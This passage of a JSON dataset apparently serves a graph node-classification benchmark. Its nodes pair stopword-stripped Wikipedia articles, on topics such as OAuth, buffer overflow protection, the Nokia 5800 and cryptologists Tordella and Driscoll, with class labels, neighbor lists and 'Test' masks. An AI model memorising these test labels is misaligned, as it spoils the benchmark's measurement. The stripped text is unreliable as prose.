      9987,
      7943,
      278,
      7965,
      1834,
      7983,
      823,
      10057,
      11082,
      2893,
      3428,
      8557,
      6528,
      3971,
      3462,
      8584,
      7572,
      5536,
      5026,
      944,
      8627,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 6748,
    "label": 2,
    "text": "Nokia_5800_XpressMusic:nokia 5800 xpressmusic nokia 5800 xpressmusic mid-range smartphone part xpressmusic line announced nokia 2 october 2008 london started shipping november year code-named tube first touchscreen-equipped s60 device nokia essentially first device run symbian^1 also known s60 5th edition touch-specific s60-based platform created symbian foundation touchscreen features tactile feedback though use nokia haptikos technology nokia 5800 xpressmusic 3.2-inch display resolution 640x360 pixels many features standard nokia nseries gps hsdpa wi-fi support highly anticipated device 2008 went become commercial success 8 million units sold year release praised supplied stylus low price viewed negative critics camera software issues nokia 5800 xpressmusic first touchscreen device nokia range 2004 nokia 7700 announced nokia series 90 device cancelled reached market followed nokia 7710 upgraded version 7700 became available 2005 nokia also produced uiq-based nokia 6708 phone 2005 in-house development bought taiwanese manufacturer benq nokia also produced range maemo-based internet tablets touchscreen interface mobile phones one connect use phone via bluetooth 5800 however nokia first symbian s60 touchscreen device aspect ratio display first among mobile phones compatibility mode java applications touchscreen-aware works using part screen displaying essential buttons required program launch 5800 xpressmusic january 2009 followed-up release nokia n97 may june 2009 followed series 40 based nokia 6208c january 2009 device well nokia music store launched south africa 24 april 2009 market nokia 5800 xpressmusic would compete touchscreen devices sony ericsson xperia x1 sony ericsson satio iphone 3g htc touch diamond lg renoir lg arena km900 blackberry storm 9500 samsung pixon samsung i900 omnia early february 2009 website mobile-review.com initially enthusiastic handset published research concluded nokia 5800 design flaw specifically phones used daily basis earpieces produced nokia contract third party would cease function short time repairs performed warranty would temporarily fix problem defect found earpiece design nokia public relations department admitted nokia 5800 xpressmusic contained design defect according nokia switched another earpiece manufacturer 5800 produced february 2009 later free defect previously produced earpieces eligible free warranty repair new earpiece parts also supplied nokia service centres future phone repairs permanently fix defect 21 august 2009 nokia announced new variant named nokia 5800 navigation edition addition normal nokia 5800 latest version nokia maps pre-installed also comes car charger car kit inside box gps decreases battery life nokia 5800 xpressmusic 5800 navigation edition however free lifetime navigation due new version ovi maps service available nokia.com prototype handset seen 2008 batman movie dark knight number music videos christina aguilera keeps gettin better womanizer britney spears flo rida right round pitbull shut pussycat dolls jai ho hush hush katy perry waking vegas cobra starship good girls go bad phone received generally positive reviews uk phone magazine mobile choice awarding full 5 stars 7 january 2009 issue 23 january 2009 nokia announced shipped millionth 5800 xpressmusic device even though still fully released worldwide noknok reported april one fastest selling smartphones time nokia q1 report released 16 april 2009 announced company shipped 2.6 million units quarter cumulative shipments 3 million units since smartphone launch q2 results released 16 july 2009 reports 3.7 million units shipped quarter 6.8 million units total shipped since release november 2009 8 million units sold nokia 5800 xpressmusic following specifications firmware version 20.0.012 onwards 5800 cpu clock increased 369 mhz 434 mhz matching n97 specification however improved overall performance observed since firmware version 30 13 january 2010 nokia released major firmware update version 40.0.005 update includes bug fixes speed improvements new features visible kinetic scrolling menus except main applications menus improved home screen first introduced nokia 5530 software update also saw removal alphanumeric keypad landscape view text input replaced full qwerty keyboard new home screen provides contacts carousel 20 contacts program shortcuts screen time change option selecting every menus hard notice one selects holds selection white normal colours selecting option still red like v20 19 april 2010 firmware version 50.0.005 released new major update brought new features available nokia n97 upgrade existing web browser version 7.2 full kinetic scrolling auto-full screen browsing web new music player mini-album art song list album list initial letter filtering track titles music player scrolling using scroll-bar result search function removed music player new application called ovi sync installed nokia music store received revamped user interface renamed ovi music regions quick office 4.2.374 integrated full free license search application icon changed minor updates better touch sensitivity tweaks faster operation phone present little update color option select silver hold option still white like v40 also new feature one-touch dialling firmware 51.0.006 appeared august 2010 contained minor bug fixes updates various applications rds function however remains dysfunctional since version 40.0.005 web browser lost ability re-flow text page enlarged firmware 51.2.007 also released north american nokia 5800 rm-428 august 2010 following changes software release comes improved browser improved video calls new version mail exchange also general performance improvements november 2010 updated firmware nokia 5800 released nokia 5800 v52.0.007 firmware update expects still pencil select several ability gallery big disadvantage still exists pictures videos listed one gallery separate galleries pictures videos 20 october 2011 firmware version 60.0.003 released new major update brought new symbian anna browser 7.3.1.33 swipe unlock feature",
    "neighbors": [
      1537,
      4609,
      11271,
      11277,
      529,
      10770,
      5143,
      2072,
      5659,
      4132,
      40,
      3626,
      5677,
      10802,
      7220,
      5175,
      1083,
      9292,
      7246,
      1615,
      5201,
      7253,
      5211,
      1633,
      109,
      6276,
      3205,
      9359,
      659,
      5274,
      669,
      6310,
      167,
      5290,
      10410,
      690,
      7866,
      1216,
      1728,
      4291,
      7877,
      199,
      11469,
      4305,
      2259,
      6870,
      9443,
      3300,
      4324,
      7399,
      8423,
      1776,
      8433,
      4365,
      8472,
      11545,
      1833,
      821,
      10557,
      10053,
      6996,
      854,
      10583,
      10599,
      6505,
      5998,
      8577,
      11655,
      1424,
      2449,
      8083,
      7063,
      5019,
      4003,
      9137,
      7617,
      967,
      9163,
      464,
      3561,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 6749,
    "label": 4,
    "text": "Louis_W._Tordella:louis w. tordella louis william tordella may 1 1911 – january 10 1996 longest serving deputy director national security agency tordella born garrett indiana may 1 1911 grew chicago environs displayed early affinity mathematics obtained bachelors masters doctoral degrees 1930s outbreak world war ii found teaching mathematics chicago loyola university joined us navy immediately made contacts service brought aboard lieutenant junior grade 1942 went directly cryptologic work navy codebreaking organization op-20-g finished war op-20-g collection stations west coast bainbridge island washington skaggs island naval communication station war tordella stayed navy 1949 joined newly created armed forces security agency afsa early attempt achieve service unity business cryptology key figure devising policy new agency successor national security agency emerged 1952 replace afsa career nsa brought front rank cryptologists early advocate use computers cryptologic work helped cement close working relationship american industry grasp computer technology associated engineering concepts coupled understanding cryptanalysis led tordella push forcefully development supercomputers cryptologic applications tordella also leader securing american communications pushing series leading-edge new encoding devices secure u.s. government communications senior official nsa tordella played central role nsa outside relationships close collaborators britain commonwealth nations built trust tordella many foreign intelligence officials regarded linchpin relationship nsa tordella became deputy director nsa 1958 remained post retirement 1974 thus became longest serving deputy director nsa history tordella received unprecedented honors years retirement 1974 received national security medal national intelligence distinguished service medal relationship british recognized 1976 became honorary knight commander excellent order british empire 1992 security affairs support association composed mainly retired intelligence officials gave william o. baker medal distinguished service american intelligence died bethesda naval hospital 1996 waldenström macroglobulinemia colon cancer autopsy done determine actually caused death following death sixteen boxes recovered nsa office safe according budiansky ... documents turned compendium every single one nsa highly classified compartmented programs post-world war ii era lew allen ensured nsa department director ever wielded untrammeled power",
    "neighbors": [
      266,
      6668,
      9357,
      2712,
      289,
      4898,
      11302,
      1714,
      6578,
      10305,
      327,
      4937,
      7887,
      10832,
      2897,
      4566,
      7137,
      365,
      4719,
      2419
    ],
    "mask": "Test"
  },
  {
    "node_id": 6750,
    "label": 5,
    "text": "OAuth:oauth oauth open standard access delegation commonly used way internet users grant websites applications access information websites without giving passwords mechanism used companies amazon google facebook microsoft twitter permit users share information accounts third party applications websites generally oauth provides clients secure delegated access server resources behalf resource owner specifies process resource owners authorize third-party access server resources without sharing credentials designed specifically work hypertext transfer protocol http oauth essentially allows access tokens issued third-party clients authorization server approval resource owner third party uses access token access protected resources hosted resource server oauth service complementary distinct openid oauth unrelated oath reference architecture authentication standard authorization however oauth directly related openid connect oidc since oidc authentication layer built top oauth 2.0 oauth also unrelated xacml authorization policy standard oauth used conjunction xacml oauth used ownership consent access delegation whereas xacml used define authorization policies e.g managers view documents region oauth began november 2006 blaine cook developing twitter openid implementation meanwhile ma.gnolia needed solution allow members openids authorize dashboard widgets access service cook chris messina larry halff magnolia met david recordon discuss using openid twitter ma.gnolia apis delegate authentication concluded open standards api access delegation oauth discussion group created april 2007 small group implementers write draft proposal open protocol dewitt clinton google learned oauth project expressed interest supporting effort july 2007 team drafted initial specification eran hammer joined coordinated many oauth contributions creating formal specification 4 december 2007 oauth core 1.0 final draft released 73rd internet engineering task force ietf meeting minneapolis november 2008 oauth bof held discuss bringing protocol ietf standardization work event well attended wide support formally chartering oauth working group within ietf oauth 1.0 protocol published rfc 5849 informational request comments april 2010 since 31 august 2010 third party twitter applications required use oauth oauth 2.0 framework published rfc 6749 bearer token usage rfc 6750 standards track requests comments october 2012 oauth 2.0 backwards compatible oauth 1.0 oauth 2.0 provides specific authorization flows web applications desktop applications mobile phones smart devices specification associated rfcs developed ietf oauth wg main framework published october 2012 facebook graph api supports oauth 2.0 google supports oauth 2.0 recommended authorization mechanism apis microsoft also supports oauth 2.0 various apis azure active directory service used secure many microsoft third party apis oauth 2.0 framework bearer token usage published october 2012 23 april 2009 session fixation security flaw 1.0 protocol announced affects oauth authorization flow also known 3-legged oauth oauth core 1.0 section 6 version 1.0a oauth core protocol issued address issue oauth 2.0 support signature encryption channel binding client verification relies completely tls degree confidentiality server authentication january 2013 internet engineering task force published threat model oauth 2.0 among threats outlined one called open redirector spring 2014 variant described name covert redirect wang jing oauth 2.0 analyzed using formal web protocol analysis analysis revealed setups multiple authorization servers one behaving maliciously clients become confused authorization server use may forward secrets malicious authorization server mix-up attack prompted creation new best current practice internet draft sets define new security standard oauth 2.0 assuming fix mix-up attack place security oauth 2.0 proven strong attacker models using formal analysis implementations oauth 2.0 numerous security flaws exposed april–may 2017 one million users gmail less 0.1 users may 2017 targeted oauth-based phishing attack receiving email purporting colleague employer friend wanting share document google docs clicked link within email directed sign allow potentially malicious third-party program called google apps access email account contacts online documents within approximately one hour phishing attack stopped google advised given google apps access email revoke access change passwords oauth used authorizing mechanism consume secured rss/atom feeds consumption rss/atom feeds require authentication always issue example rss feed secured google site could consumed using google reader instead three-legged oauth would used authorize rss client access feed google site also used means login without creating account site benefits host oauth system oauth authorization protocol rather authentication protocol using oauth authentication method may referred pseudo-authentication following diagrams highlight differences using openid specifically designed authentication protocol oauth authentication communication flow processes similar crucial difference openid authentication use case response identity provider assertion identity oauth authorization use case identity provider also api provider response identity provider access token may grant application ongoing access identity provider apis user behalf access token acts kind valet key application include requests identity provider prove permission user access apis identity provider typically always authenticates user part process granting oauth access token tempting view successful oauth access token request authentication method however oauth designed use case mind making assumption lead major security flaws xacml policy-based attribute-based access control authorization framework provides xacml oauth combined together deliver comprehensive approach authorization oauth provide policy language define access control policies xacml used policy language oauth focuses delegated access user grant twitter access facebook wall identity-centric authorization xacml takes attribute-based approach consider attributes user action resource context xacml possible define policies xacml provides fine-grained access control oauth oauth limited granularity coarse functionality scopes exposed target service result often makes sense combine oauth xacml together oauth provide delegated access use case consent management xacml provide authorization policies work applications processes data lastly xacml work transparently across multiple stacks apis web sso esbs home-grown apps databases ... oauth focuses exclusively http-based apps eran hammer resigned role lead author oauth 2.0 project withdrew ietf working group removed name specification july 2012 hammer cited conflict web enterprise cultures reason leaving noting ietf community enterprise use cases capable simple offered blueprint authorization protocol noted enterprise way providing whole new frontier sell consulting services integration solutions comparing oauth 2.0 oauth 1.0 hammer points become complex less interoperable less useful incomplete importantly less secure explains architectural changes 2.0 unbound tokens clients removed signatures cryptography protocol level added expiring tokens tokens could n't revoked complicating processing authorization numerous items left unspecified unlimited specification nature working group issue small get stuck leave open implementation decide hammer later gave presentation yet elaborating views david recordon later also removed name specifications unspecified reasons dick hardt took editor role framework published october 2012",
    "neighbors": [
      9734,
      7,
      1551,
      4242,
      3477,
      2076,
      2080,
      6561,
      2083,
      9635,
      2087,
      1069,
      10673,
      10801,
      820,
      4663,
      10167,
      5433,
      4797,
      574,
      5568,
      3521,
      322,
      3269,
      5573,
      10058,
      6098,
      2013,
      8670,
      2143,
      4575,
      9313,
      2274,
      10466,
      6888,
      1516,
      9967,
      1012,
      254
    ],
    "mask": "None"
  },
  {
    "node_id": 6751,
    "label": 2,
    "text": "Microsoft-specific_exception_handling_mechanisms:microsoft-specific exception handling mechanisms microsoft windows os family employs exception handling mechanisms based operating system specifics microsoft structured exception handling native exception handling mechanism windows forerunner technology vectored exception handling veh features codice_1 mechanism present standard c++ exceptions present imperative languages introduced later seh set handled separately thread execution microsoft supports seh programming technique compiler level ms visual c++ compiler features three non-standard keywords codice_2 codice_3 codice_4 — purpose exception handling aspects backed number win32 api functions example codice_5 raise seh exceptions manually thread execution windows link undocumented _exception_registration_record list start thread information block codice_2 statement essentially calls compiler-defined codice_7 function function allocates _exception_registration_record stack pointing codice_8 function codice_9 adds record list head end codice_2 block compiler-defined codice_11 function called reverse operation either compiler-defined routines inline programmer-defined codice_3 codice_4 blocks called within codice_8 programmer-defined blocks present _exception_registration_record created codice_7 extended additional fields used codice_8 case exception user mode code operating system parses thread _exception_registration_record list calls exception handler sequence handler signals handled exception return value list exhausted last one list always codice_17 displays general protection fault error message list traversed giving handlers chance clean resources used finally execution returns kernel mode process either resumed terminated vectored exception handling introduced windows xp vectored exception handling made available windows programmers using languages c++ visual basic veh replace structured exception handling seh rather veh seh coexist veh handlers priority seh handlers compared seh veh works like traditional notification callback scheme",
    "neighbors": [
      1474,
      7273,
      7274,
      6797,
      847,
      7760,
      7983,
      8080,
      435,
      5754,
      6078
    ],
    "mask": "None"
  },
  {
    "node_id": 6752,
    "label": 4,
    "text": "Extrusion_detection:extrusion detection extrusion detection outbound intrusion detection branch intrusion detection aimed developing mechanisms identify successful unsuccessful attempts use resources computer system compromise systems extrusion detection techniques focus primarily analysis system activity outbound traffic order detect malicious users malware network traffic may pose threat security neighboring systems intrusion detection mostly concerned identification incoming attacks intrusion attempts extrusion detection systems try prevent attacks launched first place implement monitoring controls leaf nodes network—rather concentrating choke points e.g. routers—in order distribute inspection workload take advantage visibility system state ultimate goal extrusion detection identify attack attempts launched already compromised system order prevent reaching target hereby containing impact threat",
    "neighbors": [
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 6753,
    "label": 9,
    "text": "Object_language:object language object language language object study various fields including logic linguistics mathematics theoretical computer science language used talk object language called metalanguage object language may formal natural language mathematical logic linguistics make use metalanguages languages describing nature languages mathematical logic object language usually formal language language metalanguage used describe object language called language object discussion using metalanguage instance someone says french say bonjour greet someone uses english metalanguage describe object language french two ways term object language used computing language object formal specification language object goal compiler interpreter computer languages object languages metalanguage specification written computer science referred specification language backus–naur form one earliest used specification languages compilers written using systems like lex yacc rules programmer writes look much like formal specification considered implementation instead many programming language implementations strictly specifications adding features making implementation-dependent design decisions basic level computers act given limited set instructions understood cpus earliest computers meant programmers sometimes composed actual 1 0 program since requires considerable programmer training patience create instructions later computer languages gone great lengths simplify programmer task example high level programming language may allow programmer assign value variable without specifying memory location cpu instruction context high level programming language source language translated compiler object code cpu read directly object code object language varies depending cpu given instructions object language context means something akin object programmer trying achieve source language object languages viewed formal logical languages compiler interpret source target language different computer science use interpreted language meaning one compiled object language context synonymous target language object language translation often machine language kind language assembly language object language compilation usually machine language term object file come mean file containing machine instructions sometimes translated program simply called object object language also confused object-oriented language type computer programming language changes programmer environment convenient objects used something similar drag-and-drop fashion symbol idea abstraction concept tokens may marks configuration marks form particular pattern although term symbol common use refers times idea symbolized times marks piece paper chalkboard used express idea formal languages studied mathematics logic term symbol refers idea marks considered token instance symbol formal languages used mathematical logic computer science well-formed formula simply formula idea abstraction concept expressed using symbols formation rules also called formal grammar particular formal language say string symbols formula_1 well-formed formula respect given formal grammar formula_2 equivalent saying formula_1 belongs language generated formula_2 formal system formal language together deductive system consists set inference rules and/or axioms formal system used derive one expression one expressions previously expressed system expressions called axioms case previously supposed true theorems case derived formal system may formulated studied intrinsic properties may intended description i.e model external phenomena theorem symbol string symbols derived using formal system string symbols logical consequence axioms rules system formal proof derivation finite sequence propositions called well-formed formulas case formal language axiom follows preceding sentences sequence rule inference last sentence sequence theorem formal system concept natural deduction generalization concept proof theory set sentences formal language",
    "neighbors": [
      477,
      1952,
      10560,
      8037,
      8262,
      11625,
      8554,
      1552,
      5395,
      3386,
      5213
    ],
    "mask": "Test"
  },
  {
    "node_id": 6754,
    "label": 4,
    "text": "Buffer_overflow_protection:buffer overflow protection buffer overflow protection various techniques used software development enhance security executable programs detecting buffer overflows stack-allocated variables preventing causing program misbehavior becoming serious security vulnerabilities stack buffer overflow occurs program writes memory address program call stack outside intended data structure usually fixed-length buffer stack buffer overflow bugs caused program writes data buffer located stack actually allocated buffer almost always results corruption adjacent data stack could lead program crashes incorrect operation security issues typically buffer overflow protection modifies organization stack-allocated data includes canary value destroyed stack buffer overflow shows buffer preceding memory overflowed verifying canary value execution affected program terminated preventing misbehaving allowing attacker take control buffer overflow protection techniques include bounds checking checks accesses allocated block memory go beyond actually allocated space tagging ensures memory allocated storing data contain executable code overfilling buffer allocated stack likely influence program execution overfilling buffer heap stack contains return addresses active function calls however similar implementation-specific protections also exist heap-based overflows several implementations buffer overflow protection including gnu compiler collection llvm microsoft visual studio compilers stack buffer overflow occurs program writes memory address program call stack outside intended data structure usually fixed-length buffer stack buffer overflow bugs caused program writes data buffer located stack actually allocated buffer almost always results corruption adjacent data stack cases overflow triggered mistake often cause program crash operate incorrectly stack buffer overflow type general programming malfunction known buffer overflow buffer overrun overfilling buffer stack likely derail program execution overfilling buffer heap stack contains return addresses active function calls stack buffer overflow caused deliberately part attack known stack smashing affected program running special privileges accepts data untrusted network hosts example public webserver bug potential security vulnerability allows attacker inject executable code running program take control process one oldest reliable methods attackers gain unauthorized access computer typically buffer overflow protection modifies organization data stack frame function call include canary value destroyed shows buffer preceding memory overflowed provides benefit preventing entire class attacks according researchers performance impact techniques negligible stack-smashing protection unable protect certain forms attack example protect buffer overflows heap sane way alter layout data within structure structures expected modules especially shared libraries data structure buffer impossible protect canaries thus programmers must careful organize variables use structures canaries canary words known values placed buffer control data stack monitor buffer overflows buffer overflows first data corrupted usually canary failed verification canary data therefore alert overflow handled example invalidating corrupted data canary value confused sentinel value terminology reference historic practice using canaries coal mines since would affected toxic gases earlier miners thus providing biological warning system canaries alternately known cookies meant evoke image broken cookie value corrupted three types canaries use terminator random random xor current versions stackguard support three propolice supports terminator random canaries terminator canaries use observation buffer overflow attacks based certain string operations end string terminators reaction observation canaries built null terminators cr lf -1 result attacker must write null character writing return address avoid altering canary prevents attacks using codice_1 methods return upon copying null character undesirable result canary known even protection attacker could potentially overwrite canary known value control information mismatched values thus passing canary check code executed soon specific processor return-from-call instruction random canaries randomly generated usually entropy-gathering daemon order prevent attacker knowing value usually logically possible plausible read canary exploiting canary secure value known need know it—the buffer overflow protection code case normally random canary generated program initialization stored global variable variable usually padded unmapped pages attempting read using kinds tricks exploit bugs read ram cause segmentation fault terminating program may still possible read canary attacker knows get program read stack random xor canaries random canaries xor-scrambled using part control data way canary control data clobbered canary value wrong random xor canaries vulnerabilities random canaries except read stack method getting canary bit complicated attacker must get canary algorithm control data order re-generate original canary needed spoof protection addition random xor canaries protect certain type attack involving overflowing buffer structure pointer change pointer point piece control data xor encoding canary wrong control data return value changed pointer control data return value changed without overflowing canary although canaries protect control data altered clobbered pointers protect data pointers function pointers especially problem overflowed execute shellcode called bounds checking compiler-based technique adds run-time bounds information allocated block memory checks pointers run-time c c++ bounds checking performed pointer calculation time dereference time implementations approach use either central repository describes allocated block memory fat pointers contain pointer additional data describing region point tagging compiler-based hardware-based requiring tagged architecture technique tagging type piece data memory used mainly type checking marking certain areas memory non-executable effectively prevents memory allocated store data containing executable code also certain areas memory marked non-allocated preventing buffer overflows historically tagging used implementing high-level programming languages appropriate support operating system tagging also used detect buffer overflows example nx bit hardware feature supported intel amd arm processors stack-smashing protection first implemented stackguard 1997 published 1998 usenix security symposium stackguard introduced set patches intel x86 backend gcc 2.7 stackguard maintained immunix linux distribution 1998 2003 extended implementations terminator random random xor canaries stackguard suggested inclusion gcc 3.x gcc 2003 summit proceedings never achieved 2001 2005 ibm developed gcc patches stack-smashing protection known propolice improved idea stackguard placing buffers local pointers function arguments stack frame helped avoid corruption pointers preventing access arbitrary memory locations redhat engineers identified problems propolice though 2005 re-implemented stack-smashing protection inclusion gcc 4.1 work introduced -fstack-protector flag protects vulnerable functions -fstack-protector-all flag protects functions whether need 2012 google engineers implemented -fstack-protector-strong flag strike better balance security performance flag protects kinds vulnerable functions -fstack-protector every function providing better performance -fstack-protector-all available gcc since version 4.9 fedora packages compiled -fstack-protector since fedora core 5 -fstack-protector-strong since fedora 20 packages ubuntu compiled -fstack-protector since 6.10 every arch linux package compiled -fstack-protector since 2011 arch linux packages built since use -fstack-protector-strong stack protection used packages debian freebsd base system since 8.0 stack protection standard certain operating systems including openbsd hardened gentoo dragonfly bsd stackguard propolice protect overflows automatically allocated structures overflow function pointers propolice least rearrange allocation order get structures allocated function pointers separate mechanism pointer protection proposed pointguard available microsoft windows compiler suite microsoft implements buffer overflow protection since version 2003 command-line switch enabled default since version 2005 using disables protection stack-smashing protection turned compiler flag codice_2 clang supports three buffer overflow detectors namely addresssanitizer -fsanitize=address -fsanitize=bounds safecode systems different tradeoffs terms performance penalty memory overhead classes detected bugs stack protection standard certain operating systems including openbsd intel c c++ compiler supports stack-smashing protection options similar provided gcc microsoft visual studio fail-safe c open-source memory-safe ansi c compiler performs bounds checking based fat pointers object-oriented memory access invented mike frantzen stackghost simple tweak register window spill/fill routines makes buffer overflows much difficult exploit uses unique hardware feature sun microsystems sparc architecture deferred on-stack in-frame register window spill/fill detect modifications return pointers common way exploit hijack execution paths transparently automatically protecting applications without requiring binary source modifications performance impact negligible less one percent resulting gdb issues resolved mark kettenis two years later allowing enabling feature following event stackghost code integrated optimized openbsd/sparc normal buffer allocation x86 architectures similar architectures shown buffer overflow entry show modified process pertains stackguard function called stack frame created stack frame built end memory beginning stack frame placed top stack closest beginning memory thus running end piece data stack frame alters data previously entered stack frame running end stack frame places data previous stack frame typical stack frame may look return address reta placed first followed control information ctli c function may contain many different per-call data structures piece data created call placed stack frame order thus ordered end beginning memory hypothetical function stack frame hypothetical situation ten bytes written array 13 character array excess overflow integer pointer integer control information finally return address overwriting pointer made reference position memory causing read arbitrary address overwriting reta function made execute code attempts return either existing functions ret2libc code written stack overflow nutshell poor handling unbounded strcpy calls may allow attacker control program influencing values assigned directly goal buffer overflow protection detect issue least intrusive way possible done removing harms way placing sort tripwire canary buffer buffer overflow protection implemented change compiler possible protection alter structure data stack frame exactly case systems propolice function automatic variables rearranged safely arrays allocated first stack frame places integer integer pointer memory stack frame becomes impossible move ctli reta without breaking produced code another tactic employed extra piece information called canary cnry placed buffers stack frame buffers overflow canary value changed thus effectively attack program attacker must leave definite indication attack stack frame end every function instruction continues execution memory address indicated reta instruction executed check cnry ensures altered value cnry fails test program execution ended immediately essence deliberate attacks inadvertent programming bugs result program abort canary technique adds instructions overhead every function call automatic array immediately dynamic buffer allocation dynamic buffer deallocation overhead generated technique significant work though unless canary remains unchanged attacker knows determine value canary may simply copy usually difficult arrange intentionally highly improbable unintentional situations position canary implementation specific always buffers protected data varied positions lengths varied benefits",
    "neighbors": [
      8066,
      3473,
      1820,
      5501,
      9244,
      5279,
      7717,
      3624,
      9854,
      814,
      7983,
      5040,
      5176,
      9665,
      1474,
      1094,
      4562,
      6868,
      4956,
      8671,
      9317,
      4582,
      4071,
      9964,
      499,
      1399,
      3323,
      3708,
      2045,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 6755,
    "label": 4,
    "text": "Agnes_Meyer_Driscoll:agnes meyer driscoll agnes meyer driscoll july 24 1889 – september 16 1971 known miss aggie madame x american cryptanalyst world war world war ii born geneseo illinois 1889 driscoll moved family westerville ohio 1895 father gustav meyer taken job teaching music otterbein college 1909 donated family home anti-saloon league recently moved headquarters westerville home later donated westerville public library home anti-saloon league museum westerville local history center driscoll attended otterbein college 1907 1909 1911 received bachelor arts degree ohio state university majored mathematics physics studied foreign languages statistics music fluent english french german latin japanese earliest days college student pursued technical scientific studies graduation moved amarillo texas lived 1911 1918 worked director music military academy later chair mathematics department local high school june 22 1918 one year america entered world war driscoll enlisted united states navy – america started allowing women enlist recruited highest possible rank chief yeoman stint postal cable censorship office assigned code signal section director naval communications war ended made use option continue working post civilian except two-year hiatus worked private firm would remain leading cryptanalyst u.s. navy 1949 1920 continuing work navy driscoll studied riverbank laboratories geneva illinois fellow code breakers including william f. friedman elizebeth smith friedman worked known also worked american black chamber run herbert yardley first u.s. peacetime code-breaking agency set break codes used diplomatic correspondence efforts limited manual systems involved also emerging machine technology time applied making breaking ciphers first days code signal section co-developed one u.s. navy cipher machines cm cipher machine would become standard enciphering device navy 1920s recognition work united states congress awarded driscoll 15,000 split widow machine coinventor william greshem 1923 inventor edward hebern creator fledgling hebern electric code company attempting create secure rotor-driven cipher machine driscoll left navy test machine failed deliver secure encryption system agnes returned navy spring 1924 august 1924 married michael driscoll washington d.c. lawyer driscoll alongside lieutenant joseph rochefort broke japanese navy manual code red book code 1926 three years work helped broke blue book code 1930 early 1935 agnes driscoll led attack japanese m-1 cipher machine also known u.s. orange machine used encrypt messages japanese naval attaches around world 1939 made important inroads jn-25 japanese fleet operational code used important messages successfully solved cipher component 5-num system used number groups substitutes words numbers encrypted digital cipher navy could read standard format messages weather reports bulk messages remained discovered work later developed exploited attack pearl harbor rest pacific war provided advance warning japanese attack midway atoll would unable take part work october 1940 transferred team working break german naval enigma cipher period driscoll mentored following naval cryptographers getting work jn-25 started driscoll transferred new group attacked german enigma ciphers using catalog approach similar rainbow tables almost two years work new assignment driscoll team unable make progress solving german device partly due unwillingness use machine support mathematical approach also refused help british code breakers bletchley park traveled united states advise besides u.s. u.k. communicate effectively approach fruitless tried british determined unlikely work ultimately work superseded us-uk cryptologic exchanges 1942–43 1943 worked team break japanese cipher coral broken two months later although driscoll said little influence project 1945 appears worked attacking russian ciphers driscoll part navy contingent joined new national cryptologic agencies firstly armed forces security agency 1949 national security agency 1952 armed forces security agency may contributed attacking cipher called venona 1946 retirement national security agency filled number positions advanced ranks senior leadership retired armed forces security agency 1959 died 1971 buried arlington national cemetery 2000 inducted national security agency hall honor 2017 ohio historical marker placed front meyer home westerville honoring agnes meyer driscoll achievements",
    "neighbors": [
      4007,
      7887,
      10832,
      6164,
      2580,
      1941
    ],
    "mask": "Test"
  },
  {
    "node_id": 6756,
    "label": 1,
    "text": "PhpLDAPadmin:phpldapadmin phpldapadmin web app administering lightweight directory access protocol ldap servers written php programming language licensed gnu general public license application available 14 languages supports utf-8 encoded directory strings project began fall 2002 dave smith student brigham young university byu lead developer needed robust web application manage ldap servers originally phpldapadmin called davedap august 2003 name changed phpldapadmin since time software downloaded approximately 150 times per day commonly used throughout world two developers contributed code base xavier renard uwe ebel xavier focused ldif imports/exports samba software integration uwe focused internationalizing application spring 2005 deon george took maintenance phpldapadmin due long period starting 2016 new pull requests merged master project releases made several forks exist implement new compatibilities functionality since spring 2019 new development going many pull requests merged project restoring compatibility recent php releases following linux distributions include phpldapadmin official software repositories available extra packages enterprise linux epel repository allowing managed installation distributions red hat enterprise linux fedora centos scientific linux included m23 software distribution system manages distributes software debian ubuntu kubuntu xubuntu linux mint fedora centos opensuse distributions also available repositories freebsd openbsd solaris",
    "neighbors": [
      6651,
      8644,
      7277,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 6757,
    "label": 4,
    "text": "Open_Relay_Behavior-modification_System:open relay behavior-modification system open relay behavior-modification system orbs created run alan brown new zealand one first dns-based blackhole lists dnsbl means internet domain may publish list ip addresses database easily queried automatically computer programs internet orbs list used blacklist ip addresses open mail relays third-party mail servers spammers relay messages thus attempt obfuscate source spam orbs list controversial number reasons many people felt methods orbs employed scan internet open mail servers could abusive orbs used probes test open relays without permission sometimes claimed testing networks continued even asked orbs stop others claimed relayed spam n't stop either cases tests interfered mail servers causing delays especially servers assigned hundreds ip addresses related testing regime excessive eyes number email administrators brown policy adding servers unable test list whether actually open relays also matter dispute another complaint open relays never sent spam listed without notice false listings orbs also alleged particularly brown engaged legal dispute listed party website created 2001 brad baker called stoporbs.org offer assistance mail administrators listed orbs blacklist reasons open relays many administrators felt listing servers reasons advertised open relays list reliable supposed purpose orbs created run alan brown new zealand shut 2001 due brown health money issues two lawsuits brought companies listed orbs xtra actrix refused remove companies listed orbs blocked probes kept relaying spam brown forced sell internet service provider manawatu internet services cover expenses state companies listed inappropriately brown also defamation lawsuit brought o'brien v brown court ruled brown made defamatory comments patrick o'brien ceo domainz .nz domain registrar comments made domainz discussion group brown offered chance apologize made additional defamatory comments following o'brien victory awarding 42,000 brown claimed net worth 500 said lawyer several groups cached lists retested open relays replaced orbs running open relay became even bigger problem dnsbls listing open relays got effective spammers shifted insecure proxy servers internet society new zealand council seats subsequently domainz board filled rebel members elections july 2000 o'brien departed run singapore internet registry",
    "neighbors": [
      6757,
      8224,
      4725,
      5407
    ],
    "mask": "None"
  },
  {
    "node_id": 6758,
    "label": 2,
    "text": "Fedora_Unity:fedora unity fedora unity community project build comprehensive concise websites content provide fedora users contributors quality information submissions project covered open publication license options unless otherwise noted order allow submission fedora documentation project fedora unity project produces iso images i386 x86_64 architectures available jigdo downloads containing slipstreamed installation media last release fedora 12 re-spins-20100303 released march 19 2010 re-spin isos based officially released fedora 12 installation media include updates released march 3 2010",
    "neighbors": [
      823,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 6759,
    "label": 6,
